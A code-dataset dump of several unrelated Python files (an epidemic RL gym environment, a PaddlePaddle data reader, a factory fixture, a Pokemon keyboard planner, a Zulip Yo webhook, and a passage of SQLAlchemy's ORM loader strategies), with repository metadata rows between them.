| 76
| 0.683261
|
4a07e3b2f1fba58965908d71d6306afa3a4d15e3
| 227
|
py
|
Python
|
tests/__init__.py
|
idealist/Alfajor
|
340ed875fd36a2b4aab0caba686dd189cc43f5bd
|
[
"BSD-3-Clause"
] | 2
|
2015-11-01T22:29:54.000Z
|
2018-02-15T15:54:30.000Z
|
tests/__init__.py
|
jek/alfajor
|
867f66ea1a9306fe24a0498215d2c9b83d43188d
|
[
"BSD-3-Clause"
] | 1
|
2015-10-14T08:02:50.000Z
|
2020-04-26T06:18:48.000Z
|
tests/__init__.py
|
idealist/Alfajor
|
340ed875fd36a2b4aab0caba686dd189cc43f5bd
|
[
"BSD-3-Clause"
] | 3
|
2015-09-16T14:31:23.000Z
|
2020-09-08T06:34:12.000Z
|
# Copyright Action Without Borders, Inc., the Alfajor authors and contributors.
# All rights reserved. See AUTHORS.
#
# This file is part of 'alfajor' and is distributed under the BSD license.
# See LICENSE for more details.
| 32.428571
| 79
| 0.757709
|
4a07e441bf3a004bd2a8796ba5df82c34106dff7
| 8,859
|
py
|
Python
|
envs/EpidemicMultiEnv.py
|
covidmulator/EpidemicEnv
|
d9caf28d2636c1c852cb01e669a038d7a466fc3e
|
[
"MIT"
] | 4
|
2020-10-29T14:47:15.000Z
|
2021-11-17T13:51:13.000Z
|
envs/EpidemicMultiEnv.py
|
covidmulator/EpidemicEnv
|
d9caf28d2636c1c852cb01e669a038d7a466fc3e
|
[
"MIT"
] | 1
|
2020-10-10T16:44:08.000Z
|
2020-10-19T06:07:03.000Z
|
envs/EpidemicMultiEnv.py
|
covidmulator/EpidemicEnv
|
d9caf28d2636c1c852cb01e669a038d7a466fc3e
|
[
"MIT"
] | 1
|
2020-10-29T12:25:29.000Z
|
2020-10-29T12:25:29.000Z
|
import gym
import numpy as np
from gym import spaces
from sklearn.preprocessing import MinMaxScaler
from random import choice, randint, random
from typing import List, Tuple
# encoding for q table
# entity에 개개인의 값을 가지도록 만들면 좋을 듯
EMPTY = 0
COMMON = 2
VIRUS = 1
ISOLATION = 3
AGENT_MATRIX = [
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
]
REWARD_MATRIX = [
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
]
class EpidemicMultiEnv(gym.Env):
def __init__(self, env_config):
agent_matrix = AGENT_MATRIX
reward_matrix = REWARD_MATRIX
self.agent_num = env_config["agent_num"]
self.action_length = 4
self.state_length = 15 * 15
self.action_space = spaces.Box(low=-1.0,high=4.0,shape=(15,15),dtype=np.float32),
self.observation_space = spaces.Box(low=-1.0, high=4.0,shape=(15,15),dtype=np.float32)
self.population = self.min_max_norm(env_config["population"])
Q = np.zeros([15, 15])
self.agent_matrix = agent_matrix = np.array(agent_matrix).astype(int)
self.nrow, self.ncol = nrow, ncol = self.agent_matrix.shape
self.reward_range = (-1, 1)
self.agents = self.get_position()
self.has_virus = self.get_virus()
self.episode = 0
self.destinations = self.get_position()
self.steps = [0 for _ in range(env_config["agent_num"])]
self.reward_matrix = self.get_reward_matrix(reward_matrix)
self.Q_list = [Q for _ in range(env_config["agent_num"])]
self.lr = .8
self.y = .95
self.epsilon = .9
self.s = [self.encode_state(i) for i in range(self.agent_num)]
self.reward_arr = [0 for _ in range(env_config["agent_num"])]
self.reward_all_arr = [0 for _ in range(env_config["agent_num"])]
def min_max_norm(self, lst: list) -> list:
scaler = MinMaxScaler(feature_range=(-1, 1))
scaler.fit(lst)
lst_norm = scaler.transform(lst)
return lst_norm
def get_reward_matrix(self, matrix: list) -> list:
matrix_result = matrix
e = self.episode
matrix_result[2][9] = self.population[0][e]
matrix_result[11][4] = self.population[1][e]
matrix_result[9][4] = self.population[2][e]
matrix_result[7][4] = self.population[3][e]
matrix_result[9][9] = self.population[4][e]
matrix_result[3][4] = self.population[5][e]
return matrix_result
def get_position(self) -> list:
num_x = list(range(0, self.ncol))
num_y = list(range(0, self.nrow))
positions = list()
positions_return = list()
for x in num_x:
for y in num_y:
positions.append([x, y])
for _ in range(self.agent_num):
selected = choice(positions)
positions_return.append(selected)
positions.pop(positions.index(selected))
return positions_return
def get_virus(self) -> list:
index = randint(0, self.agent_num - 1)
virus_return = [False for _ in range(self.agent_num)]
virus_return[index] = True
x, y = self.agents[index]
self.agent_matrix[x][y] = VIRUS
return virus_return
def get_target(self, direction: int, index: int) -> Tuple[int, int]:
delta_x = [0, 0, -1, 1]
delta_y = [-1, 1, 0, 0]
agent_x = self.agents[index][0]
agent_y = self.agents[index][1]
return agent_x + delta_x[direction], agent_y + delta_y[direction]
def is_virus_around(self, index: int) -> bool:
result = False
x = self.agents[index][0]
y = self.agents[index][1]
for action in range(4):
if(self.is_move_correct(action, index)):
around_x, around_y = self.get_target(action, index)
if(self.agent_matrix[around_x][around_y] == VIRUS):
self.has_virus[self.agents.index([x, y])] = True
result = True
return result
def is_move_correct(self, action: int, index: int) -> bool:
if(0 < action < 4):
agent_x, agent_y = self.get_target(action, index)
return (0 <= agent_x < self.nrow - 1) and (0 <= agent_y < self.ncol - 1)
return False
def encode_state(self, index: int) -> int:
x = self.agents[index][0]
y = self.agents[index][1]
return self.agent_matrix[x][y]
def move_link(self, x: int, y: int, index: int, status: int) -> None:
agent_x = self.agents[index][0]
agent_y = self.agents[index][1]
self.agent_matrix[x][y] = status
self.agent_matrix[agent_x][agent_y] = 0
self.agents[index][0] = x
self.agents[index][1] = y
def move(self, direction: int, index: int) -> Tuple[float, bool]:
agent_x = self.agents[index][0]
agent_y = self.agents[index][1]
status = COMMON
self.steps[index] += 1
if(self.is_virus_around(index)):
status = VIRUS
self.steps[index] -= 1
x, y = self.get_target(direction, index)
object_in_direction = int(self.agent_matrix[x][y])
reward_return = 0
is_end = False
if x == self.destinations[index][0] and y == self.destinations[index][1]:
status = EMPTY
is_end = True
elif object_in_direction == EMPTY:
self.move_link(x, y, index, status)
reward_return = .5
elif object_in_direction == VIRUS:
self.move_link(x, y, index, status)
reward_return = -.1
elif object_in_direction == COMMON:
self.move_link(x, y, index, status)
reward_return = -.1
elif object_in_direction == ISOLATION:
self.move_link(x, y, index, status)
reward_return = -.1
reward_return += self.reward_matrix[agent_x][agent_y]
return reward_return, is_end
def choose_action(self):
actions = list()
for index in range(self.agent_num):
if (random() < (self.epsilon / np.log(self.episode + 2))):
a = randint(0, 15 - 1)
else:
a = np.argmax(self.Q_list[index][self.s,:][index] + np.random.randn(1, 15) * (1. / (self.episode + 1)))
actions.append(a)
return actions
def action(self, actions) -> Tuple[list, list, list, dict]:
rewards = list()
encode_states = list()
dones = list()
for i in range(self.agent_num):
if (self.is_move_correct(actions[i], i)):
r, d = self.move(actions[i], i)
else:
r, d = -1, False
encode_states.append(self.encode_state(i))
rewards.append(r)
dones.append(d)
return encode_states, rewards, False in dones, {}
def update_reward_matrix(self, matrix: list) -> None:
for x, lst in enumerate(self.reward_matrix):
for y in range(len(lst)):
self.reward_matrix[x][y] += matrix[x][y]
def step(self, matrix: list) -> Tuple[list, float, list, dict]:
self.update_reward_matrix(matrix)
actions = self.choose_action()
s1, r, d, _ = self.action(actions)
for index in range(self.agent_num):
Q_sa = self.Q_list[index][self.s[index], actions[index]]
self.Q_list[index][self.s[index], actions[index]] = Q_sa + self.lr * (r[index] + self.y * np.max(self.Q_list[index][s1[index], :]) - Q_sa)
self.reward_all_arr[index] += r[index]
self.s[index] = s1[index]
return self.agent_matrix, np.mean(self.steps), d, {}
def reset(self) -> List[int]:
agent_matrix = AGENT_MATRIX
reward_matrix = REWARD_MATRIX
self.episode += 1
self.agent_matrix = agent_matrix = np.array(agent_matrix).astype(int)
self.reward_matrix = self.get_reward_matrix(reward_matrix)
self.agents = self.get_position()
self.has_virus = self.get_virus()
self.destinations = self.get_position()
states = [self.encode_state(i) for i in range(self.agent_num)]
self.s = states
return np.array(agent_matrix).astype(int)
| 31.193662
| 144
| 0.590134
|
4a07e512d01c66e5bd778c0ab11a00f78fb138a0
| 5,988
|
py
|
Python
|
PaddleRec/ctr/Paddle_baseline_KDD2019/map_reader.py
|
suytingwan/models
|
ccdbfe77d071cc19b55fb9f4b738912e35d982ef
|
[
"Apache-2.0"
] | 5
|
2021-09-28T13:28:01.000Z
|
2021-12-21T07:25:44.000Z
|
PaddleRec/ctr/Paddle_baseline_KDD2019/map_reader.py
|
suytingwan/models
|
ccdbfe77d071cc19b55fb9f4b738912e35d982ef
|
[
"Apache-2.0"
] | 2
|
2019-06-26T03:21:49.000Z
|
2019-09-19T09:43:42.000Z
|
PaddleRec/ctr/Paddle_baseline_KDD2019/map_reader.py
|
suytingwan/models
|
ccdbfe77d071cc19b55fb9f4b738912e35d982ef
|
[
"Apache-2.0"
] | 3
|
2021-09-28T15:33:45.000Z
|
2021-09-29T01:44:32.000Z
|
# Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import json
import paddle.fluid.incubate.data_generator as dg
class MapDataset(dg.MultiSlotDataGenerator):
def setup(self, sparse_feature_dim):
self.profile_length = 65
self.dense_length = 3
#feature names
self.dense_feature_list = ["distance", "price", "eta"]
self.pid_list = ["pid"]
self.query_feature_list = ["weekday", "hour", "o1", "o2", "d1", "d2"]
self.plan_feature_list = ["transport_mode"]
self.rank_feature_list = ["plan_rank", "whole_rank", "price_rank", "eta_rank", "distance_rank"]
self.rank_whole_pic_list = ["mode_rank1", "mode_rank2", "mode_rank3", "mode_rank4",
"mode_rank5"]
self.weather_feature_list = ["max_temp", "min_temp", "wea", "wind"]
self.hash_dim = 1000001
self.train_idx_ = 2000000
#carefully set if you change the features
self.categorical_range_ = range(0, 22)
#process one instance
def _process_line(self, line):
instance = json.loads(line)
"""
profile = instance["profile"]
len_profile = len(profile)
if len_profile >= 10:
user_profile_feature = profile[0:10]
else:
profile.extend([0]*(10-len_profile))
user_profile_feature = profile
if len(profile) > 1 or (len(profile) == 1 and profile[0] != 0):
for p in profile:
if p >= 1 and p <= 65:
user_profile_feature[p - 1] = 1
"""
context_feature = []
context_feature_fm = []
dense_feature = [0] * self.dense_length
plan = instance["plan"]
for i, val in enumerate(self.dense_feature_list):
dense_feature[i] = plan[val]
if (instance["pid"] == ""):
instance["pid"] = 0
query = instance["query"]
weather_dic = instance["weather"]
for fea in self.pid_list:
context_feature.append([hash(fea + str(instance[fea])) % self.hash_dim])
context_feature_fm.append(hash(fea + str(instance[fea])) % self.hash_dim)
for fea in self.query_feature_list:
context_feature.append([hash(fea + str(query[fea])) % self.hash_dim])
context_feature_fm.append(hash(fea + str(query[fea])) % self.hash_dim)
for fea in self.plan_feature_list:
context_feature.append([hash(fea + str(plan[fea])) % self.hash_dim])
context_feature_fm.append(hash(fea + str(plan[fea])) % self.hash_dim)
for fea in self.rank_feature_list:
context_feature.append([hash(fea + str(instance[fea])) % self.hash_dim])
context_feature_fm.append(hash(fea + str(instance[fea])) % self.hash_dim)
for fea in self.rank_whole_pic_list:
context_feature.append([hash(fea + str(instance[fea])) % self.hash_dim])
context_feature_fm.append(hash(fea + str(instance[fea])) % self.hash_dim)
for fea in self.weather_feature_list:
context_feature.append([hash(fea + str(weather_dic[fea])) % self.hash_dim])
context_feature_fm.append(hash(fea + str(weather_dic[fea])) % self.hash_dim)
label = [int(instance["label"])]
return dense_feature, context_feature, context_feature_fm, label
def infer_reader(self, filelist, batch, buf_size):
print(filelist)
def local_iter():
for fname in filelist:
with open(fname.strip(), "r") as fin:
for line in fin:
dense_feature, sparse_feature, sparse_feature_fm, label = self._process_line(line)
yield [dense_feature] + sparse_feature + [sparse_feature_fm] + [label]
import paddle
batch_iter = paddle.batch(
paddle.reader.shuffle(
local_iter, buf_size=buf_size),
batch_size=batch)
return batch_iter
#generat inputs for testing
def test_reader(self, filelist, batch, buf_size):
print(filelist)
def local_iter():
for fname in filelist:
with open(fname.strip(), "r") as fin:
for line in fin:
dense_feature, sparse_feature, sparse_feature_fm, label = self._process_line(line)
yield [dense_feature] + sparse_feature + [sparse_feature_fm] + [label]
import paddle
batch_iter = paddle.batch(
paddle.reader.buffered(
local_iter, size=buf_size),
batch_size=batch)
return batch_iter
#generate inputs for trainig
def generate_sample(self, line):
def data_iter():
dense_feature, sparse_feature, sparse_feature_fm, label = self._process_line(line)
#feature_name = ["user_profile"]
feature_name = []
feature_name.append("dense_feature")
for idx in self.categorical_range_:
feature_name.append("context" + str(idx))
feature_name.append("context_fm")
feature_name.append("label")
yield zip(feature_name, [dense_feature] + sparse_feature + [sparse_feature_fm] + [label])
return data_iter
if __name__ == "__main__":
map_dataset = MapDataset()
map_dataset.setup(int(sys.argv[1]))
map_dataset.run_from_stdin()
| 41.013699
| 106
| 0.616232
|
4a07e558df59373c4d7dbfa6fe224c4d73a940c2
| 322
|
py
|
Python
|
bookshop/sqlalchemy/fixture/BookGenre.py
|
robyoung/genyrator
|
849f2ec83ef6dd9e2e5928cb58f747cc40016f2a
|
[
"MIT"
] | null | null | null |
bookshop/sqlalchemy/fixture/BookGenre.py
|
robyoung/genyrator
|
849f2ec83ef6dd9e2e5928cb58f747cc40016f2a
|
[
"MIT"
] | 9
|
2019-09-13T09:31:55.000Z
|
2021-01-11T11:09:17.000Z
|
bookshop/sqlalchemy/fixture/BookGenre.py
|
robyoung/genyrator
|
849f2ec83ef6dd9e2e5928cb58f747cc40016f2a
|
[
"MIT"
] | 1
|
2020-07-22T15:03:41.000Z
|
2020-07-22T15:03:41.000Z
|
import factory
from bookshop.sqlalchemy import db
from bookshop.sqlalchemy.model.BookGenre import BookGenre
class BookGenreFactory(factory.alchemy.SQLAlchemyModelFactory):
class Meta:
model = BookGenre
sqlalchemy_session = db.session
book_genre_id = factory.Faker('uuid4', cast_to=lambda x: x)
| 24.769231
| 63
| 0.763975
|
4a07e570a298bd36f26c458c30ec6c6ed1b923c2
| 1,981
|
py
|
Python
|
extras/pokemontools/vba/keyboard.py
|
longlostsoul/EvoYellow
|
fe5d0d372c4e90d384c4005a93f19d7968f2ff13
|
[
"Unlicense"
] | 16
|
2018-08-28T21:47:01.000Z
|
2022-02-20T20:29:59.000Z
|
extras/pokemontools/vba/keyboard.py
|
longlostsoul/EvoYellow
|
fe5d0d372c4e90d384c4005a93f19d7968f2ff13
|
[
"Unlicense"
] | 5
|
2019-04-03T19:53:11.000Z
|
2022-03-11T22:49:34.000Z
|
extras/pokemontools/vba/keyboard.py
|
longlostsoul/EvoYellow
|
fe5d0d372c4e90d384c4005a93f19d7968f2ff13
|
[
"Unlicense"
] | 2
|
2019-12-09T19:46:02.000Z
|
2020-12-05T21:36:30.000Z
|
# -*- coding: utf-8 -*-
"""
This file constructs a networkx.DiGraph object called graph, which can be used
to find the shortest path of keypresses on the keyboard to type a word.
"""
import os
import itertools
import networkx
graph = networkx.DiGraph()
# load graph data from file
data_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "keyboard.data")
graph_data = open(data_path, "r").read()
for line in graph_data.split("\n"):
if line == "":
continue
elif line[0] == "#":
continue
(node1, node2, edge_name) = line.split(" ")
graph.add_edge(node1, node2, key=edge_name)
#print "Adding edge ("+edge_name+") "+node1+" -> "+node2
def shortest_path(node1, node2):
"""
Figures out the shortest list of button presses to move from one letter to
another.
"""
buttons = []
last = None
path = networkx.shortest_path(graph, node1, node2)
for each in path:
if last != None:
buttons.append(convert_nodes_to_button_press(last, each))
last = each
return buttons
#return [convert_nodes_to_button_press(node3, node4) for (node3, node4) in zip(*(iter(networkx.shortest_path(graph, node1, node2)),) * 2)]
def convert_nodes_to_button_press(node1, node2):
"""
Determines the button necessary to switch from node1 to node2.
"""
print "getting button press for state transition: " + node1 + " -> " + node2
return graph.get_edge_data(node1, node2)["key"]
def plan_typing(text, current="A"):
"""
Plans a sequence of button presses to spell out the given text.
"""
buttons = []
for target in text:
if target == current:
buttons.append("a")
else:
print "Finding the shortest path between " + current + " and " + target
more_buttons = shortest_path(current, target)
buttons.extend(more_buttons)
buttons.append("a")
current = target
return buttons
| 30.476923
| 142
| 0.64109
|
4a07e6f8bca5d0956fdd8a936991d3cfb5100f9f
| 902
|
py
|
Python
|
zerver/webhooks/yo/view.py
|
roberthoenig/zulip
|
5d6724345a8ba4896d21478be2e33e624f8ac8ab
|
[
"Apache-2.0"
] | null | null | null |
zerver/webhooks/yo/view.py
|
roberthoenig/zulip
|
5d6724345a8ba4896d21478be2e33e624f8ac8ab
|
[
"Apache-2.0"
] | null | null | null |
zerver/webhooks/yo/view.py
|
roberthoenig/zulip
|
5d6724345a8ba4896d21478be2e33e624f8ac8ab
|
[
"Apache-2.0"
] | null | null | null |
# Webhooks for external integrations.
from __future__ import absolute_import
from zerver.lib.actions import check_send_message
from zerver.lib.response import json_success
from zerver.decorator import REQ, has_request_variables, api_key_only_webhook_view
from zerver.models import UserProfile
from django.http import HttpRequest, HttpResponse
from typing import Optional
import ujson
@api_key_only_webhook_view('Yo')
@has_request_variables
def api_yo_app_webhook(request, user_profile, email=REQ(default=None),
username=REQ(default='Yo Bot'), topic=REQ(default=None),
user_ip=REQ(default=None)):
# type: (HttpRequest, UserProfile, Optional[str], str, Optional[str], Optional[str]) -> HttpResponse
body = ('Yo from %s') % (username,)
check_send_message(user_profile, request.client, 'private', [email], topic, body)
return json_success()
| 41
| 104
| 0.752772
|
4a07e785696f3520085a40999762215510eb5bb1
| 55,884
|
py
|
Python
|
flask/lib/python2.7/site-packages/sqlalchemy/orm/strategies.py
|
blackbliss/callme
|
fe254ef4c3af36ab7a65f3de0071d2c79375e3e0
|
[
"MIT"
] | null | null | null |
flask/lib/python2.7/site-packages/sqlalchemy/orm/strategies.py
|
blackbliss/callme
|
fe254ef4c3af36ab7a65f3de0071d2c79375e3e0
|
[
"MIT"
] | 4
|
2017-10-24T22:44:01.000Z
|
2017-10-24T22:44:19.000Z
|
flask/lib/python2.7/site-packages/sqlalchemy/orm/strategies.py
|
blackbliss/callme
|
fe254ef4c3af36ab7a65f3de0071d2c79375e3e0
|
[
"MIT"
] | 1
|
2021-04-16T11:10:59.000Z
|
2021-04-16T11:10:59.000Z
|
# orm/strategies.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""sqlalchemy.orm.interfaces.LoaderStrategy
implementations, and related MapperOptions."""
from .. import exc as sa_exc, inspect
from .. import util, log, event
from ..sql import util as sql_util, visitors
from .. import sql
from . import (
attributes, interfaces, exc as orm_exc, loading,
unitofwork, util as orm_util
)
from .state import InstanceState
from .util import _none_set
from . import properties
from .interfaces import (
LoaderStrategy, StrategizedProperty
)
from .session import _state_session
import itertools
def _register_attribute(strategy, mapper, useobject,
compare_function=None,
typecallable=None,
uselist=False,
callable_=None,
proxy_property=None,
active_history=False,
impl_class=None,
**kw
):
prop = strategy.parent_property
attribute_ext = list(util.to_list(prop.extension, default=[]))
listen_hooks = []
if useobject and prop.single_parent:
listen_hooks.append(single_parent_validator)
if prop.key in prop.parent.validators:
fn, opts = prop.parent.validators[prop.key]
listen_hooks.append(
lambda desc, prop: orm_util._validator_events(desc,
prop.key, fn, **opts)
)
if useobject:
listen_hooks.append(unitofwork.track_cascade_events)
# need to assemble backref listeners
# after the singleparentvalidator, mapper validator
backref = kw.pop('backref', None)
if backref:
listen_hooks.append(
lambda desc, prop: attributes.backref_listeners(desc,
backref,
uselist)
)
for m in mapper.self_and_descendants:
if prop is m._props.get(prop.key):
desc = attributes.register_attribute_impl(
m.class_,
prop.key,
parent_token=prop,
uselist=uselist,
compare_function=compare_function,
useobject=useobject,
extension=attribute_ext,
trackparent=useobject and (prop.single_parent
or prop.direction is interfaces.ONETOMANY),
typecallable=typecallable,
callable_=callable_,
active_history=active_history,
impl_class=impl_class,
send_modified_events=not useobject or not prop.viewonly,
doc=prop.doc,
**kw
)
for hook in listen_hooks:
hook(desc, prop)
@properties.ColumnProperty.strategy_for(instrument=False, deferred=False)
class UninstrumentedColumnLoader(LoaderStrategy):
"""Represent the a non-instrumented MapperProperty.
The polymorphic_on argument of mapper() often results in this,
if the argument is against the with_polymorphic selectable.
"""
def __init__(self, parent):
super(UninstrumentedColumnLoader, self).__init__(parent)
self.columns = self.parent_property.columns
def setup_query(self, context, entity, path, loadopt, adapter,
column_collection=None, **kwargs):
for c in self.columns:
if adapter:
c = adapter.columns[c]
column_collection.append(c)
def create_row_processor(self, context, path, loadopt, mapper, row, adapter):
return None, None, None
@log.class_logger
@properties.ColumnProperty.strategy_for(instrument=True, deferred=False)
class ColumnLoader(LoaderStrategy):
"""Provide loading behavior for a :class:`.ColumnProperty`."""
def __init__(self, parent):
super(ColumnLoader, self).__init__(parent)
self.columns = self.parent_property.columns
self.is_composite = hasattr(self.parent_property, 'composite_class')
def setup_query(self, context, entity, path, loadopt,
adapter, column_collection, **kwargs):
for c in self.columns:
if adapter:
c = adapter.columns[c]
column_collection.append(c)
def init_class_attribute(self, mapper):
self.is_class_level = True
coltype = self.columns[0].type
# TODO: check all columns ? check for foreign key as well?
active_history = self.parent_property.active_history or \
self.columns[0].primary_key or \
mapper.version_id_col in set(self.columns)
_register_attribute(self, mapper, useobject=False,
compare_function=coltype.compare_values,
active_history=active_history
)
def create_row_processor(self, context, path,
loadopt, mapper, row, adapter):
key = self.key
# look through list of columns represented here
# to see which, if any, is present in the row.
for col in self.columns:
if adapter:
col = adapter.columns[col]
if col is not None and col in row:
def fetch_col(state, dict_, row):
dict_[key] = row[col]
return fetch_col, None, None
else:
def expire_for_non_present_col(state, dict_, row):
state._expire_attribute_pre_commit(dict_, key)
return expire_for_non_present_col, None, None
@log.class_logger
@properties.ColumnProperty.strategy_for(deferred=True, instrument=True)
class DeferredColumnLoader(LoaderStrategy):
"""Provide loading behavior for a deferred :class:`.ColumnProperty`."""
def __init__(self, parent):
super(DeferredColumnLoader, self).__init__(parent)
if hasattr(self.parent_property, 'composite_class'):
raise NotImplementedError("Deferred loading for composite "
"types not implemented yet")
self.columns = self.parent_property.columns
self.group = self.parent_property.group
def create_row_processor(self, context, path, loadopt, mapper, row, adapter):
col = self.columns[0]
if adapter:
col = adapter.columns[col]
key = self.key
if col in row:
return self.parent_property._get_strategy_by_cls(ColumnLoader).\
create_row_processor(
context, path, loadopt, mapper, row, adapter)
elif not self.is_class_level:
set_deferred_for_local_state = InstanceState._row_processor(
mapper.class_manager,
LoadDeferredColumns(key), key)
return set_deferred_for_local_state, None, None
else:
def reset_col_for_deferred(state, dict_, row):
# reset state on the key so that deferred callables
# fire off on next access.
state._reset(dict_, key)
return reset_col_for_deferred, None, None
def init_class_attribute(self, mapper):
self.is_class_level = True
_register_attribute(self, mapper, useobject=False,
compare_function=self.columns[0].type.compare_values,
callable_=self._load_for_state,
expire_missing=False
)
def setup_query(self, context, entity, path, loadopt, adapter,
only_load_props=None, **kwargs):
if (
loadopt and self.group and
loadopt.local_opts.get('undefer_group', False) == self.group
) or (only_load_props and self.key in only_load_props):
self.parent_property._get_strategy_by_cls(ColumnLoader).\
setup_query(context, entity,
path, loadopt, adapter, **kwargs)
def _load_for_state(self, state, passive):
if not state.key:
return attributes.ATTR_EMPTY
if not passive & attributes.SQL_OK:
return attributes.PASSIVE_NO_RESULT
localparent = state.manager.mapper
if self.group:
toload = [
p.key for p in
localparent.iterate_properties
if isinstance(p, StrategizedProperty) and
isinstance(p.strategy, DeferredColumnLoader) and
p.group == self.group
]
else:
toload = [self.key]
# narrow the keys down to just those which have no history
group = [k for k in toload if k in state.unmodified]
session = _state_session(state)
if session is None:
raise orm_exc.DetachedInstanceError(
"Parent instance %s is not bound to a Session; "
"deferred load operation of attribute '%s' cannot proceed" %
(orm_util.state_str(state), self.key)
)
query = session.query(localparent)
if loading.load_on_ident(query, state.key,
only_load_props=group, refresh_state=state) is None:
raise orm_exc.ObjectDeletedError(state)
return attributes.ATTR_WAS_SET
class LoadDeferredColumns(object):
"""serializable loader object used by DeferredColumnLoader"""
def __init__(self, key):
self.key = key
def __call__(self, state, passive=attributes.PASSIVE_OFF):
key = self.key
localparent = state.manager.mapper
prop = localparent._props[key]
strategy = prop._strategies[DeferredColumnLoader]
return strategy._load_for_state(state, passive)
class AbstractRelationshipLoader(LoaderStrategy):
"""LoaderStratgies which deal with related objects."""
def __init__(self, parent):
super(AbstractRelationshipLoader, self).__init__(parent)
self.mapper = self.parent_property.mapper
self.target = self.parent_property.target
self.uselist = self.parent_property.uselist
@log.class_logger
@properties.RelationshipProperty.strategy_for(lazy="noload")
@properties.RelationshipProperty.strategy_for(lazy=None)
class NoLoader(AbstractRelationshipLoader):
"""Provide loading behavior for a :class:`.RelationshipProperty`
with "lazy=None".
"""
def init_class_attribute(self, mapper):
self.is_class_level = True
_register_attribute(self, mapper,
useobject=True,
uselist=self.parent_property.uselist,
typecallable=self.parent_property.collection_class,
)
def create_row_processor(self, context, path, loadopt, mapper, row, adapter):
def invoke_no_load(state, dict_, row):
state._initialize(self.key)
return invoke_no_load, None, None
@log.class_logger
@properties.RelationshipProperty.strategy_for(lazy=True)
@properties.RelationshipProperty.strategy_for(lazy="select")
class LazyLoader(AbstractRelationshipLoader):
"""Provide loading behavior for a :class:`.RelationshipProperty`
with "lazy=True", that is loads when first accessed.
"""
def __init__(self, parent):
super(LazyLoader, self).__init__(parent)
join_condition = self.parent_property._join_condition
self._lazywhere, \
self._bind_to_col, \
self._equated_columns = join_condition.create_lazy_clause()
self._rev_lazywhere, \
self._rev_bind_to_col, \
self._rev_equated_columns = join_condition.create_lazy_clause(
reverse_direction=True)
self.logger.info("%s lazy loading clause %s", self, self._lazywhere)
# determine if our "lazywhere" clause is the same as the mapper's
# get() clause. then we can just use mapper.get()
self.use_get = not self.uselist and \
self.mapper._get_clause[0].compare(
self._lazywhere,
use_proxies=True,
equivalents=self.mapper._equivalent_columns
)
if self.use_get:
for col in list(self._equated_columns):
if col in self.mapper._equivalent_columns:
for c in self.mapper._equivalent_columns[col]:
self._equated_columns[c] = self._equated_columns[col]
self.logger.info("%s will use query.get() to "
"optimize instance loads" % self)
def init_class_attribute(self, mapper):
self.is_class_level = True
active_history = (
self.parent_property.active_history or
self.parent_property.direction is not interfaces.MANYTOONE or
not self.use_get
)
# MANYTOONE currently only needs the
# "old" value for delete-orphan
# cascades. the required _SingleParentValidator
# will enable active_history
# in that case. otherwise we don't need the
# "old" value during backref operations.
_register_attribute(self,
mapper,
useobject=True,
callable_=self._load_for_state,
uselist=self.parent_property.uselist,
backref=self.parent_property.back_populates,
typecallable=self.parent_property.collection_class,
active_history=active_history
)
def lazy_clause(self, state, reverse_direction=False,
alias_secondary=False,
adapt_source=None,
passive=None):
if state is None:
return self._lazy_none_clause(
reverse_direction,
adapt_source=adapt_source)
if not reverse_direction:
criterion, bind_to_col, rev = \
self._lazywhere, \
